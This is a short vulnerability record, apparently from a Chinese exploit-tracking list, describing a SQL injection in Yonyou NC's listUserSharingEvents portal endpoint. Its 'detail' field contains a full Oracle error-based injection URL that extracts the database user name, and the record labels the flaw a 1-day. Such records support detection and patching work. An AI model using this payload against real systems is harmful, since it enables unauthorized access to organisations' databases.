vendor = "用友"
name = "用友NC listUserSharingEvents 存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/portal/pt/oacoSchedulerEvents/listUserSharingEvents"
detail = "/portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=6')+AND+1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')--&pageId=login&sch_ed=2&sch_sd=1"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0701"
label = "1day"
verifier = "AdySec"
